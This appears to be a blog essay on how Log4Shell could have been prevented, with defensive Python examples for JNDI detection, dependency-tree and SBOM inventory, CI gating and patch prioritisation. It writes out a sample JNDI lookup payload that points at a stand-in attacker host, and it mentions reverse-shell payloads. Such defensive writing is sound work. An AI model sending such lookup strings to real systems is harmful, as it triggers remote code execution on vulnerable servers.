Log4Shell Was Preventable

I still remember when Log4Shell was disclosed on December 9th, 2021. It was one of the most severe vulnerabilities in software history: a single line of untrusted input could trigger remote code execution in virtually any Java application that logged it with a vulnerable version of Log4j 2.

The mechanics of the vulnerability are pretty straightforward. Log4j 2 includes a message lookup feature that evaluates JNDI expressions, for example ${jndi:ldap://attacker.example/a}, when they appear in log messages. An attacker who can get their string logged by an application can trigger a JNDI lookup to an attacker-controlled server, which responds with a reference to a Java class that gets loaded and executed.
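To make the shape of such a payload concrete, here is a minimal Python sketch that looks for plain JNDI lookup expressions in strings an application is about to log. The function name and the sample hostname are made up for illustration. It assumes the unobfuscated form only; real attacks also used nested lookups such as ${${lower:j}ndi:...}, which this pattern does not catch, so treat it as an illustration of the input shape and not as a defence.

```python
import re
from typing import List

# Matches a plain JNDI lookup such as "${jndi:ldap://host/a}".
# Assumption: only the unobfuscated form is covered; nested lookups are missed.
JNDI_LOOKUP = re.compile(r"\$\{jndi:[^}]*\}", re.IGNORECASE)


def find_jndi_lookups(text: str) -> List[str]:
    """Return every plain JNDI lookup expression found in text."""
    return JNDI_LOOKUP.findall(text)


# Hypothetical user-supplied values that an application might log.
SAMPLE_INPUTS = [
    "alice",
    "${jndi:ldap://attacker.example/a}",
]

for value in SAMPLE_INPUTS:
    print(repr(value), "->", find_jndi_lookups(value))
```

The real fix was to upgrade Log4j; pattern matching on input is at best a stopgap.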

This feature was not designed for this purpose. It was designed for dynamic log enrichment. But the capability to fetch and execute remote code via a log statement had been there for years, waiting to be exploited.

For example, in a typical e-commerce application, log messages might include user input like usernames or product names. That input could be crafted to trigger a JNDI lookup, and the attacker-controlled server could then respond with a malicious Java class. I have seen cases where this class was a simple reverse shell, giving the attacker full control over the server.

Log4j 2 is used in a huge portion of the Java ecosystem, from enterprise applications to cloud services, game servers, and even IoT firmware. Many organisations did not know which of their systems used it, because it is frequently a transitive dependency, bundled inside frameworks that bundle other frameworks.

In my experience, transitive dependencies are a major issue. For instance, if an application uses a framework starter that in turn pulls in Log4j 2 (Spring Boot does this when its optional Log4j 2 starter is selected in place of the default Logback), the team may not even be aware that it is using Log4j 2. This is where build tools like Maven or Gradle can help, by printing a dependency tree that shows all the transitive dependencies.
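As a rough illustration, the following Python sketch walks the text output of Maven's dependency:tree goal and reports the chain of dependencies that leads to a given artifact. The sample tree, the project coordinates, and the function name paths_to are hypothetical, and the parser assumes the default (non-verbose) text layout with three characters of indentation per level.

```python
import re
from typing import List

# One tree line: optional "[INFO] " prefix, indentation built from "|  ", "   ",
# "+- " and "\- " (three characters per level), then the Maven coordinates.
LINE = re.compile(r"^(?:\[INFO\] )?(?P<indent>(?:[|\\+ ][ -] )*)(?P<coords>\S+:\S+)$")

# Hypothetical output of `mvn dependency:tree` for an imaginary project.
SAMPLE_TREE = r"""[INFO] com.example:shop:jar:1.0.0
[INFO] +- com.example:web-framework:jar:3.1.0:compile
[INFO] |  +- com.example:http-client:jar:1.4.2:compile
[INFO] |  \- com.example:logging-starter:jar:3.1.0:compile
[INFO] |     \- org.apache.logging.log4j:log4j-core:jar:2.14.1:compile
[INFO] \- junit:junit:jar:4.13.2:test"""


def paths_to(tree_text: str, artifact: str) -> List[List[str]]:
    """Return the dependency chain leading to each occurrence of artifact."""
    stack: List[str] = []          # stack[d] is the latest node seen at depth d
    found: List[List[str]] = []
    for raw in tree_text.splitlines():
        match = LINE.match(raw.rstrip())
        if not match:
            continue               # skip banner lines and other build output
        depth = len(match.group("indent")) // 3
        coords = match.group("coords")
        del stack[depth:]          # drop siblings and deeper nodes
        stack.append(coords)
        # Coordinates look like group:artifact:type:version[:scope].
        parts = coords.split(":")
        if len(parts) > 1 and parts[1] == artifact:
            found.append(list(stack))
    return found


for path in paths_to(SAMPLE_TREE, "log4j-core"):
    print(" -> ".join(path))
```

In this made-up tree, the project never declares Log4j 2 directly; it arrives two levels down, which is exactly the situation that made inventory so hard.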

The first task in the response was inventory, and many organisations had no automated way to do it. They had to manually audit their dependencies, a task that could have been made much easier with a Software Bill of Materials. An SBOM is a machine-readable inventory of every dependency in a software artifact.

Organisations with SBOMs could query for Log4j in minutes, while organisations without them spent days auditing dependencies manually. For example, using CycloneDX, which is a standard format for SBOMs with tooling to generate them, organisations can produce a detailed inventory of their dependencies and then use this inventory to identify vulnerabilities like Log4Shell.
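A query like that can be very small. The sketch below reads a CycloneDX JSON document and lists log4j-core components that need a closer look. The sample SBOM and the function names are hypothetical. The version cut-off is a simplifying assumption: it flags every 2.x release below 2.15.0 and ignores backported fix releases and the follow-up CVEs, so the official Apache advisory remains the reference for the exact affected ranges.

```python
import json
import re
from typing import List, Tuple

# Hypothetical, heavily trimmed CycloneDX JSON document for illustration.
SAMPLE_SBOM = json.dumps({
    "bomFormat": "CycloneDX",
    "specVersion": "1.4",
    "components": [
        {"type": "library", "group": "org.apache.logging.log4j",
         "name": "log4j-core", "version": "2.14.1"},
        {"type": "library", "group": "org.apache.logging.log4j",
         "name": "log4j-core", "version": "2.17.1"},
        {"type": "library", "group": "com.example",
         "name": "orders", "version": "1.0.0"},
    ],
})


def version_key(version: str) -> Tuple[int, ...]:
    """Turn '2.14.1' or '2.0-beta9' into a tuple of its leading integers."""
    match = re.match(r"\d+(?:\.\d+)*", version)
    return tuple(int(p) for p in match.group(0).split(".")) if match else ()


def needs_review(component: dict) -> bool:
    """True for log4j-core 2.x below 2.15.0 (assumed cut-off, see lead-in)."""
    if (component.get("group") != "org.apache.logging.log4j"
            or component.get("name") != "log4j-core"):
        return False
    key = version_key(component.get("version", ""))
    return key[:1] == (2,) and key < (2, 15)


def find_log4j(sbom_json: str) -> List[str]:
    """Return group:name:version for every component that needs review."""
    sbom = json.loads(sbom_json)
    return [
        f"{c['group']}:{c['name']}:{c['version']}"
        for c in sbom.get("components", [])
        if needs_review(c)
    ]


print(find_log4j(SAMPLE_SBOM))
```

Run across a directory of SBOMs, one per deployed artifact, a loop over find_log4j is the "minutes, not days" inventory described above.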

However, even with an SBOM, there are trade-offs to consider, such as the overhead of keeping the SBOM current and the potential for false positives or false negatives when matching it against vulnerability data. In my experience, the benefits of an SBOM far outweigh the costs, because it helps organisations respond quickly to vulnerabilities like Log4Shell.

Organisations with SBOMs could also use this information to prioritise their patching efforts. For instance, if an organisation has a critical application that uses Log4j 2, it can patch that application first. This is where tools like Snyk or Dependabot can help: they attach a severity or priority rating to each vulnerable dependency, which can feed into the patching order.

So what could have been done differently? Dependency scanning in CI/CD should be non-negotiable. Tools like Dependabot, Snyk, or OWASP Dependency-Check running on every build would have flagged the vulnerable Log4j version once the advisory was published. Container image scanning should cover both base image vulnerabilities and application dependencies.

In a typical CI/CD pipeline, the scanning tools can be integrated as a gate: if a vulnerability is detected, the build fails, and the vulnerability has to be fixed before the build can proceed. This is where the concept of shift-left security comes in, where security is integrated into the development process rather than being an afterthought.
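A gate of this kind can be sketched in a few lines of Python. The findings format, the field names, and the "high" threshold below are assumptions made for illustration; a real pipeline would read whatever report its scanner produces and map it into a similar structure.

```python
from typing import Dict, List

# Severity levels from least to most serious.
SEVERITY_ORDER = ["low", "medium", "high", "critical"]

# Hypothetical scanner findings in an assumed, simplified format.
SAMPLE_FINDINGS = [
    {"id": "CVE-2021-44228", "package": "log4j-core",
     "version": "2.14.1", "severity": "critical"},
    {"id": "EXAMPLE-0001", "package": "some-library",
     "version": "1.2.3", "severity": "low"},
]


def blocking_findings(findings: List[Dict[str, str]],
                      threshold: str = "high") -> List[Dict[str, str]]:
    """Return the findings whose severity is at or above the threshold."""
    limit = SEVERITY_ORDER.index(threshold)
    return [f for f in findings
            if SEVERITY_ORDER.index(f["severity"]) >= limit]


def gate(findings: List[Dict[str, str]], threshold: str = "high") -> int:
    """Print blocking findings and return a process exit code (0 = pass)."""
    blocked = blocking_findings(findings, threshold)
    for f in blocked:
        print(f"BLOCKED: {f['package']} {f['version']} "
              f"({f['id']}, {f['severity']})")
    return 1 if blocked else 0


# A CI step would pass this value to sys.exit() so the build fails on 1.
exit_code = gate(SAMPLE_FINDINGS)
print("exit code:", exit_code)
```

The important design choice is the non-zero exit code: a report that nobody has to read does not stop a release, while a failed build does.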

The gap is not the scanning tools. They exist and are effective. The gap is adoption and integration into release gates. Many organisations are still not using these tools, or not using them effectively, and that's what needs to change.

For instance, I have seen cases where organisations use scanning tools but have not integrated them into the CI/CD pipeline. Vulnerabilities are then not detected at build time, and the organisation cannot respond quickly to vulnerabilities like Log4Shell.

The gap is also in the prioritisation of vulnerabilities. Many organisations rank vulnerabilities by severity or CVSS score alone rather than by risk, which also depends on how exposed and how critical the affected system is. Ratings from tools like Snyk or Dependabot are a useful input, but they need to be combined with that context to decide what to patch first.
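To show how a risk-based ranking can differ from a CVSS-only ranking, here is a small Python sketch. The scoring formula, the multipliers, the criticality scale, and the sample systems are all hypothetical; the point is only that context changes the order, not that these particular weights are right.

```python
from dataclasses import dataclass
from typing import List


@dataclass
class Finding:
    system: str
    cvss: float               # base severity, 0.0 to 10.0
    internet_facing: bool     # reachable by untrusted users
    exploit_available: bool   # a public exploit is known
    asset_criticality: int    # 1 (low) to 3 (business critical), assumed scale


def risk_score(f: Finding) -> float:
    """Combine severity with exposure and business context (assumed weights)."""
    score = f.cvss
    if f.internet_facing:
        score *= 1.5
    if f.exploit_available:
        score *= 1.5
    return score * f.asset_criticality


def prioritise(findings: List[Finding]) -> List[Finding]:
    """Return findings ordered from highest to lowest risk score."""
    return sorted(findings, key=risk_score, reverse=True)


# Hypothetical findings across three imaginary systems.
SAMPLE = [
    Finding("batch-tool", 10.0, False, True, 1),
    Finding("payments-api", 7.5, True, True, 3),
    Finding("reporting", 9.8, False, False, 2),
]

for f in prioritise(SAMPLE):
    print(f"{f.system}: cvss={f.cvss} risk={risk_score(f):.1f}")
```

Sorted by CVSS alone, the internal batch tool comes first; with exposure and criticality factored in, the internet-facing payments service moves to the top of the patching queue.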

The gap is not just in the tools, but also in the processes and the culture. Many organisations are still not prioritising security and are not willing to invest the time and resources required to integrate security into the development process. This is what needs to change, and this is where the industry needs to come together to raise the bar for security.